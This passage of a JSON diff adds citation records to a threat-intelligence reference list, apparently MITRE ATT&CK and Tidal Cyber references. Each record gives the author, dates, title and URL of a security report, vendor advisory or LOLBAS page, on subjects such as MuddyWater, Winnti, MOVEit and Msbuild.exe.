}, + { + "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.", + "meta": { + "date_accessed": "2016-09-22T00:00:00Z", + "date_published": "2016-08-08T00:00:00Z", + "refs": [ + "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + ], + "source": "MITRE", + "title": "MONSOON - Analysis Of An APT Campaign" + }, + "related": [], + "uuid": "ea64a3a5-a248-44bb-98cd-f7e3d4c23d4e", + "value": "Forcepoint Monsoon" + }, + { + "description": "Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.", + "meta": { + "date_accessed": "2019-09-16T00:00:00Z", + "date_published": "2019-08-29T00:00:00Z", + "refs": [ + "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/" + ], + "source": "MITRE, Tidal Cyber", + "title": "More_eggs, Anyone? Threat Actor ITG08 Strikes Again" + }, + "related": [], + "uuid": "f0a0286f-adb9-4a6e-85b5-5b0f45e6fbf3", + "value": "Security Intelligence More Eggs Aug 2019" + }, + { + "description": "Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021.", + "meta": { + "date_accessed": "2021-01-22T00:00:00Z", + "date_published": "2020-07-09T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/" + ], + "source": "MITRE, Tidal Cyber", + "title": "More evil: A deep look at Evilnum and its toolset" + }, + "related": [], + "uuid": "6851b3f9-0239-40fc-ba44-34a775e9bd4e", + "value": "ESET EvilNum July 2020" + }, + { + "description": "Microsoft. (2010, August 12). More information about the DLL Preloading remote attack vector. Retrieved December 5, 2014.", + "meta": { + "date_accessed": "2014-12-05T00:00:00Z", + "date_published": "2010-08-12T00:00:00Z", + "refs": [ + "http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx" + ], + "source": "MITRE", + "title": "More information about the DLL Preloading remote attack vector" + }, + "related": [], + "uuid": "46aa7075-9f0a-461e-8519-5c4860208678", + "value": "Microsoft DLL Preloading" + }, + { + "description": "Microsoft. (2010, August 12). More information about the DLL Preloading remote attack vector. Retrieved December 5, 2014.", + "meta": { + "date_accessed": "2014-12-05T00:00:00Z", + "date_published": "2010-08-12T00:00:00Z", + "refs": [ + "https://msrc-blog.microsoft.com/2010/08/23/more-information-about-the-dll-preloading-remote-attack-vector/" + ], + "source": "MITRE", + "title": "More information about the DLL Preloading remote attack vector" + }, + "related": [], + "uuid": "80289c7b-53c1-4aec-9436-04a43a82f769", + "value": "Microsoft More information about DLL" + }, + { + "description": "valsmith. (2012, September 21). More on APTSim. Retrieved September 28, 2017.", + "meta": { + "date_accessed": "2017-09-28T00:00:00Z", + "date_published": "2012-09-21T00:00:00Z", + "refs": [ + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html" + ], + "source": "MITRE", + "title": "More on APTSim" + }, + "related": [], + "uuid": "c33ca45d-eeff-4a23-906c-99369047c7f5", + "value": "aptsim" + }, + { + "description": "Dwoskin, E. and Adam, K. (2017, May 14). More than 150 countries affected by massive cyberattack, Europol says. Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2017-05-14T00:00:00Z", + "refs": [ + "https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4" + ], + "source": "MITRE", + "title": "More than 150 countries affected by massive cyberattack, Europol says" + }, + "related": [], + "uuid": "bbf9b08a-072c-4fb9-8c3c-cb6f91e8940c", + "value": "Washington Post WannaCry 2017" + }, + { + "description": "Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel source code and proprietary data dumped online. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2020-08-06T00:00:00Z", + "refs": [ + "https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/" + ], + "source": "MITRE", + "title": "More than 20GB of Intel source code and proprietary data dumped online" + }, + "related": [], + "uuid": "99151b50-3dd8-47b5-a48f-2e3b450944e9", + "value": "ArsTechnica Intel" + }, + { + "description": "Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.", + "meta": { + "date_accessed": "2017-02-08T00:00:00Z", + "refs": [ + "https://securelist.com/winnti-more-than-just-a-game/37029/" + ], + "source": "MITRE, Tidal Cyber", + "title": "More than just a game" + }, + "related": [], + "uuid": "2d4834b9-61c4-478e-919a-317d97cd2c36", + "value": "Kaspersky Winnti April 2013" + }, + { + "description": "Lim, M. (2022, September 27). More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID. Retrieved September 29, 2022.", + "meta": { + "date_accessed": "2022-09-29T00:00:00Z", + "date_published": "2022-09-27T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload" + ], + "source": "MITRE", + "title": "More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID" + }, + "related": [], + "uuid": "dcd65d74-4e7b-5ddd-8c72-700456981347", + "value": "polygot_icedID" + }, + { + "description": "RYANJ. (2014, February 20). Mo’ Shells Mo’ Problems – Deep Panda Web Shells. Retrieved September 16, 2015.", + "meta": { + "date_accessed": "2015-09-16T00:00:00Z", + "date_published": "2014-02-20T00:00:00Z", + "refs": [ + "http://www.crowdstrike.com/blog/mo-shells-mo-problems-deep-panda-web-shells/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Mo’ Shells Mo’ Problems – Deep Panda Web Shells" + }, + "related": [], + "uuid": "e9c47d8e-f732-45c9-bceb-26c5d564e781", + "value": "CrowdStrike Deep Panda Web Shells" + }, + { + "description": "Faou, M. (2023, August 10). MoustachedBouncer: Espionage against foreign diplomats in Belarus. Retrieved September 25, 2023.", + "meta": { + "date_accessed": "2023-09-25T00:00:00Z", + "date_published": "2023-08-10T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/" + ], + "source": "MITRE", + "title": "MoustachedBouncer: Espionage against foreign diplomats in Belarus" + }, + "related": [], + "uuid": "9070f14b-5d5e-5f6d-bcac-628478e01242", + "value": "MoustachedBouncer ESET August 2023" + }, + { + "description": "Faou, M. (2023, August 10). MoustachedBouncer: Espionage against foreign diplomats in Belarus. Retrieved September 1, 2023.", + "meta": { + "date_accessed": "2023-09-01T00:00:00Z", + "date_published": "2023-08-10T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/" + ], + "source": "MITRE", + "title": "MoustachedBouncer: Espionage against foreign diplomats in Belarus" + }, + "related": [], + "uuid": "6c85e925-d42b-590c-a424-14ebb49812bb", + "value": "ESET MoustachedBouncer" + }, + { + "description": "Progress Software. (2023, June 16). MOVEit Transfer Critical Vulnerability (May 2023) (CVE-2023-34362). Retrieved July 28, 2023.", + "meta": { + "date_accessed": "2023-07-28T00:00:00Z", + "date_published": "2023-06-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023" + ], + "source": "Tidal Cyber", + "title": "MOVEit Transfer Critical Vulnerability (May 2023) (CVE-2023-34362)" + }, + "related": [], + "uuid": "9f364e22-b73c-4f3a-902c-a3f0eb01a2b9", + "value": "Progress Software MOVEit Transfer Critical Vulnerability" + }, + { + "description": "Nunez, N. (2017, August 9). Moving Beyond EMET II – Windows Defender Exploit Guard. Retrieved March 12, 2018.", + "meta": { + "date_accessed": "2018-03-12T00:00:00Z", + "date_published": "2017-08-09T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/" + ], + "source": "MITRE", + "title": "Moving Beyond EMET II – Windows Defender Exploit Guard" + }, + "related": [], + "uuid": "da4fbddf-9398-43a9-888c-2c58e9fc9aaf", + "value": "TechNet Moving Beyond EMET" + }, + { + "description": "Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration Files. Retrieved February 25, 2021.", + "meta": { + "date_accessed": "2021-02-25T00:00:00Z", + "date_published": "2019-06-05T00:00:00Z", + "refs": [ + "https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/" + ], + "source": "MITRE", + "title": "Moving to zsh, part 2: Configuration Files" + }, + "related": [], + "uuid": "08b390aa-863b-420e-9b00-e168e3c756d8", + "value": "ScriptingOSX zsh" + }, + { + "description": "Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "date_published": "2012-09-24T00:00:00Z", + "refs": [ + "https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html" + ], + "source": "MITRE", + "title": "MoVP 3.1 Detecting Malware Hooks in the Windows GUI Subsystem" + }, + "related": [], + "uuid": "e208c277-e477-4123-8c3c-313d55cdc1ea", + "value": "Volatility Detecting Hooks Sept 2012" + }, + { + "description": "Kugler, R. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.", + "meta": { + "date_accessed": "2017-03-10T00:00:00Z", + "date_published": "2012-11-20T00:00:00Z", + "refs": [ + "https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/" + ], + "source": "MITRE", + "title": "Mozilla Foundation Security Advisory 2012-98" + }, + "related": [], + "uuid": "920d1607-154e-4c74-b1eb-0d8299be536f", + "value": "Mozilla Firefox Installer DLL Hijack" + }, + { + "description": "Robert Kugler. (2012, November 20). Mozilla Foundation Security Advisory 2012-98. Retrieved March 10, 2017.", + "meta": { + "date_accessed": "2017-03-10T00:00:00Z", + "date_published": "2012-11-20T00:00:00Z", + "refs": [ + "https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/" + ], + "source": "MITRE", + "title": "Mozilla Foundation Security Advisory 2012-98" + }, + "related": [], + "uuid": "cd720550-a0b5-4d1d-85dd-98da97f45b62", + "value": "mozilla_sec_adv_2012" + }, + { + "description": "LOLBAS. (2020, March 20). MpCmdRun.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-03-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/" + ], + "source": "Tidal Cyber", + "title": "MpCmdRun.exe" + }, + "related": [], + "uuid": "2082d5ca-474f-4130-b275-c1ac5e30064c", + "value": "MpCmdRun.exe - LOLBAS Project" + }, + { + "description": "Nagaraju, S. (2014, April 8). MS14-019 – Fixing a binary hijacking via .cmd or .bat file. Retrieved July 25, 2016.", + "meta": { + "date_accessed": "2016-07-25T00:00:00Z", + "date_published": "2014-04-08T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/srd/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file/" + ], + "source": "MITRE", + "title": "MS14-019 – Fixing a binary hijacking via .cmd or .bat file" + }, + "related": [], + "uuid": "2474e2ee-bbcd-4b7c-8c52-22112d22135f", + "value": "TechNet MS14-019" + }, + { + "description": "Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.", + "meta": { + "date_accessed": "2015-01-28T00:00:00Z", + "date_published": "2014-05-13T00:00:00Z", + "refs": [ + "http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx" + ], + "source": "MITRE", + "title": "MS14-025: An Update for Group Policy Preferences" + }, + "related": [], + "uuid": "a15fff18-5d3f-4898-9e47-ec6ae7dda749", + "value": "SRD GPP" + }, + { + "description": "Microsoft. (2014, May 13). MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege. Retrieved February 17, 2020.", + "meta": { + "date_accessed": "2020-02-17T00:00:00Z", + "date_published": "2014-05-13T00:00:00Z", + "refs": [ + "https://support.microsoft.com/en-us/help/2962486/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevati" + ], + "source": "MITRE", + "title": "MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege" + }, + "related": [], + "uuid": "7537c0bb-6f14-4a4a-94cc-98c6ed9e878f", + "value": "MS14-025" + }, + { + "description": "Microsoft. (2014, May 13). MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege. Retrieved January 28, 2015.", + "meta": { + "date_accessed": "2015-01-28T00:00:00Z", + "date_published": "2014-05-13T00:00:00Z", + "refs": [ + "http://support.microsoft.com/kb/2962486" + ], + "source": "MITRE", + "title": "MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege" + }, + "related": [], + "uuid": "dbe32cbd-8c6e-483f-887c-ea2a5102cf65", + "value": "Microsoft MS14-025" + }, + { + "description": "Microsoft. (n.d.). MSBuild1. Retrieved November 30, 2016.", + "meta": { + "date_accessed": "2016-11-30T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/dd393574.aspx" + ], + "source": "MITRE", + "title": "MSBuild1" + }, + "related": [], + "uuid": "9ad54187-84b0-47f9-af6e-c3753452e470", + "value": "MSDN MSBuild" + }, + { + "description": "LOLBAS. (n.d.). Msbuild.exe. Retrieved July 31, 2019.", + "meta": { + "date_accessed": "2019-07-31T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msbuild/" + ], + "source": "MITRE", + "title": "Msbuild.exe" + }, + "related": [], + "uuid": "de8e0741-255b-4c41-ba50-248ac5acc325", + "value": "LOLBAS Msbuild" + }, + { + "description": "Microsoft. (2017, September 21). MSBuild inline tasks. Retrieved March 5, 2021.", + "meta": { + "date_accessed": "2021-03-05T00:00:00Z", + "date_published": "2017-09-21T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element" + ], + "source": "MITRE", + "title": "MSBuild inline tasks" + }, + "related": [], + "uuid": "2c638ca5-c7e2-4c4e-bb9c-e36d14899ca8", + "value": "Microsoft MSBuild Inline Tasks 2017" + }, + { + "description": "LOLBAS. (2018, May 25). Msconfig.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msconfig/" + ], + "source": "Tidal Cyber", + "title": "Msconfig.exe" + }, + "related": [], + "uuid": "a073d2fc-d20d-4a52-944e-85ff89f04978", + "value": "Msconfig.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Msdeploy.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/" + ], + "source": "Tidal Cyber", + "title": "Msdeploy.exe" + }, + "related": [], + "uuid": "e563af9a-5e49-4612-a52b-31f22f76193c", + "value": "Msdeploy.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (n.d.). Retrieved July 26, 2016.", + "meta": { + "date_accessed": "2016-07-26T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/en-us/library/cc144156.aspx" + ], + "source": "MITRE", + "title": "MSDN File Associations" + }, + "related": [], + "uuid": "f62c8cc9-9c75-4b9a-a0b4-8fc55a94e207", + "value": "MSDN File Associations" + }, + { + "description": "Microsoft. (2017, December 1). MS-DRSR Directory Replication Service (DRS) Remote Protocol. Retrieved December 4, 2017.", + "meta": { + "date_accessed": "2017-12-04T00:00:00Z", + "date_published": "2017-12-01T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/cc228086.aspx" + ], + "source": "MITRE", + "title": "MS-DRSR Directory Replication Service (DRS) Remote Protocol" + }, + "related": [], + "uuid": "43b75a27-7875-4c24-b04d-54e1b60f3028", + "value": "Microsoft DRSR Dec 2017" + }, + { + "description": "LOLBAS. (2018, May 25). Msdt.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/" + ], + "source": "Tidal Cyber", + "title": "Msdt.exe" + }, + "related": [], + "uuid": "3eb1750c-a2f2-4d68-b060-ceb32f44f5fe", + "value": "Msdt.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2022, January 20). Msedge.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-01-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msedge/" + ], + "source": "Tidal Cyber", + "title": "Msedge.exe" + }, + "related": [], + "uuid": "6169c12e-9753-4e48-8213-aff95b0f6a95", + "value": "Msedge.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2023, August 18). msedge_proxy.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2023-08-18T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/" + ], + "source": "Tidal Cyber", + "title": "msedge_proxy.exe" + }, + "related": [], + "uuid": "a6fd4727-e22f-4157-9a5f-1217cb876b32", + "value": "msedge_proxy.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2023, June 15). msedgewebview2.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2023-06-15T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/" + ], + "source": "Tidal Cyber", + "title": "msedgewebview2.exe" + }, + "related": [], + "uuid": "8125ece7-10d1-4e79-8ea1-724fe46a3c97", + "value": "msedgewebview2.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.", + "meta": { + "date_accessed": "2019-07-31T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Mshta/" + ], + "source": "MITRE", + "title": "Mshta.exe" + }, + "related": [], + "uuid": "915a4aef-800e-4c68-ad39-df67c3dbaf75", + "value": "LOLBAS Mshta" + }, + { + "description": "LOLBAS. (2018, May 25). Mshtml.dll. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Mshtml/" + ], + "source": "Tidal Cyber", + "title": "Mshtml.dll" + }, + "related": [], + "uuid": "1a135e0b-5a79-4a4c-bc70-fd8f3f84e1f0", + "value": "Mshtml.dll - LOLBAS Project" + }, + { + "description": "Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020.", + "meta": { + "date_accessed": "2020-01-24T00:00:00Z", + "date_published": "2017-10-15T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec" + ], + "source": "MITRE", + "title": "msiexec" + }, + "related": [], + "uuid": "028a8dc6-08f6-4660-8b82-9d5483d15f72", + "value": "Microsoft msiexec" + }, + { + "description": "LOLBAS. (n.d.). Msiexec.exe. Retrieved April 18, 2019.", + "meta": { + "date_accessed": "2019-04-18T00:00:00Z", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/" + ], + "source": "MITRE", + "title": "Msiexec.exe" + }, + "related": [], + "uuid": "996cc7ea-0729-4c51-b9c3-b201ec32e984", + "value": "LOLBAS Msiexec" + }, + { + "description": "CIS. (2018, December 12). MS-ISAC Security Primer- Emotet. Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2018-12-12T00:00:00Z", + "refs": [ + "https://www.cisecurity.org/white-papers/ms-isac-security-primer-emotet/" + ], + "source": "MITRE", + "title": "MS-ISAC Security Primer- Emotet" + }, + "related": [], + "uuid": "e88ba993-d5c0-440f-af52-1f70f1579215", + "value": "CIS Emotet Dec 2018" + }, + { + "description": "Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol. Retrieved December 6, 2017.", + "meta": { + "date_accessed": "2017-12-06T00:00:00Z", + "date_published": "2017-12-01T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/cc237008.aspx" + ], + "source": "MITRE", + "title": "MS-NRPC - Netlogon Remote Protocol" + }, + "related": [], + "uuid": "05cf36a3-ff04-4437-9209-376e9f27c009", + "value": "Microsoft NRPC Dec 2017" + }, + { + "description": "LOLBAS. (2022, July 24). MsoHtmEd.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-07-24T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtmEd/" + ], + "source": "Tidal Cyber", + "title": "MsoHtmEd.exe" + }, + "related": [], + "uuid": "c39fdefa-4c54-48a9-8357-ffe4dca2a2f4", + "value": "MsoHtmEd.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2022, August 2). Mspub.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2022-08-02T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/" + ], + "source": "Tidal Cyber", + "title": "Mspub.exe" + }, + "related": [], + "uuid": "41eff63a-fef0-4b4b-86f7-0908150fcfcf", + "value": "Mspub.exe - LOLBAS Project" + }, + { + "description": "Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.", + "meta": { + "date_accessed": "2017-12-04T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/cc245496.aspx" + ], + "source": "MITRE", + "title": "MS-SAMR Security Account Manager (SAM) Remote Protocol (Client-to-Server) - Transport" + }, + "related": [], + "uuid": "add907d8-06c1-481d-a27a-d077ecb32d0e", + "value": "Microsoft SAMR" + }, + { + "description": "NSA IAD. (2017, January 24). MS Security Guide. Retrieved December 18, 2017.", + "meta": { + "date_accessed": "2017-12-18T00:00:00Z", + "date_published": "2017-01-24T00:00:00Z", + "refs": [ + "https://github.com/iadgov/Secure-Host-Baseline/blob/master/Windows/Group%20Policy%20Templates/en-US/SecGuide.adml" + ], + "source": "MITRE", + "title": "MS Security Guide" + }, + "related": [], + "uuid": "15ad7216-df50-467f-a00b-687336898537", + "value": "GitHub IAD Secure Host Baseline UAC Filtering" + }, + { + "description": "LOLBAS. (2018, May 25). msxsl.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/" + ], + "source": "Tidal Cyber", + "title": "msxsl.exe" + }, + "related": [], + "uuid": "4e1ed0a8-60d0-45e2-9592-573b904811f8", + "value": "msxsl.exe - LOLBAS Project" + }, + { + "description": "Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to Proxy Code Execution. Retrieved August 2, 2019.", + "meta": { + "date_accessed": "2019-08-02T00:00:00Z", + "date_published": "2019-03-14T00:00:00Z", + "refs": [ + "https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75" + ], + "source": "MITRE", + "title": "MSXSL.EXE and WMIC.EXE — A Way to Proxy Code Execution" + }, + "related": [], + "uuid": "e4e2cf48-47e0-45d8-afc2-a35635f7e880", + "value": "XSL Bypass Mar 2019" + }, + { + "description": "Mandiant. (2015, February 24). M-Trends 2015: A View from the Front Lines. Retrieved May 18, 2016.", + "meta": { + "date_accessed": "2016-05-18T00:00:00Z", + "date_published": "2015-02-24T00:00:00Z", + "refs": [ + "https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf" + ], + "source": "MITRE", + "title": "M-Trends 2015: A View from the Front Lines" + }, + "related": [], + "uuid": "067497eb-17d9-465f-a070-495575f420d7", + "value": "Mandiant M-Trends 2015" + }, + { + "description": "Mandiant. (2016, February). M-Trends 2016. Retrieved January 4, 2017.", + "meta": { + "date_accessed": "2017-01-04T00:00:00Z", + "date_published": "2016-02-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf" + ], + "source": "MITRE", + "title": "M-Trends 2016" + }, + "related": [], + "uuid": "a4747b74-7266-439b-bb8a-bae7102b0d07", + "value": "MTrends 2016" + }, + { + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", + "meta": { + "date_accessed": "2020-04-24T00:00:00Z", + "date_published": "2020-02-01T00:00:00Z", + "refs": [ + "https://content.fireeye.com/m-trends/rpt-m-trends-2020" + ], + "source": "MITRE", + "title": "M-Trends 2020" + }, + "related": [], + "uuid": "83bc9b28-f8b3-4522-b9f1-f43bce3ae917", + "value": "Mandiant M-Trends 2020" + }, + { + "description": "Accenture iDefense Unit. (2019, March 5). Mudcarp's Focus on Submarine Technologies. Retrieved August 24, 2021.", + "meta": { + "date_accessed": "2021-08-24T00:00:00Z", + "date_published": "2019-03-05T00:00:00Z", + "refs": [ + "https://www.accenture.com/us-en/blogs/cyber-defense/mudcarps-focus-on-submarine-technologies" + ], + "source": "MITRE", + "title": "Mudcarp's Focus on Submarine Technologies" + }, + "related": [], + "uuid": "811d433d-27a4-4411-8ec9-b3a173ba0033", + "value": "Accenture MUDCARP March 2019" + }, + { + "description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.", + "meta": { + "date_accessed": "2018-03-15T00:00:00Z", + "date_published": "2017-11-14T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Muddying the Water: Targeted Attacks in the Middle East" + }, + "related": [], + "uuid": "dcdee265-2e46-4f40-95c7-6a2683edb23a", + "value": "Unit 42 MuddyWater Nov 2017" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.", + "meta": { + "date_accessed": "2018-11-02T00:00:00Z", + "date_published": "2018-10-10T00:00:00Z", + "refs": [ + "https://securelist.com/muddywater/88059/" + ], + "source": "MITRE", + "title": "MuddyWater expands operations" + }, + "related": [], + "uuid": "d968546b-5b00-4a7b-9bff-57dfedd0125f", + "value": "Securelist MuddyWater Oct 2018" + }, + { + "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.", + "meta": { + "date_accessed": "2018-11-29T00:00:00Z", + "date_published": "2018-11-01T00:00:00Z", + "refs": [ + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign" + }, + "related": [], + "uuid": "a5f60f45-5df5-407d-9f68-bc5f7c42ee85", + "value": "ClearSky MuddyWater Nov 2018" + }, + { + "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.", + "meta": { + "date_accessed": "2020-05-14T00:00:00Z", + "date_published": "2019-06-10T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/" + ], + "source": "MITRE", + "title": "MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools" + }, + "related": [], + "uuid": "bf9847e2-f2bb-4a96-af8f-56e1ffc45cf7", + "value": "TrendMicro POWERSTATS V3 June 2019" + }, + { + "description": "NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January 30, 2020.", + "meta": { + "date_accessed": "2020-01-30T00:00:00Z", + "refs": [ + "https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication" + ], + "source": "MITRE", + "title": "Multi-Factor Authentication (MFA)" + }, + "related": [], + "uuid": "2f069bb2-3f59-409e-a337-7c69411c8b01", + "value": "NIST MFA" + }, + { + "description": "Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.", + "meta": { + "date_accessed": "2018-09-05T00:00:00Z", + "date_published": "2018-07-31T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "Multiple Cobalt Personality Disorder" + }, + "related": [], + "uuid": "7cdfd0d1-f7e6-4625-91ff-f87f46f95864", + "value": "Talos Cobalt Group July 2018" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, September 7). Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475. Retrieved September 7, 2023.", + "meta": { + "date_accessed": 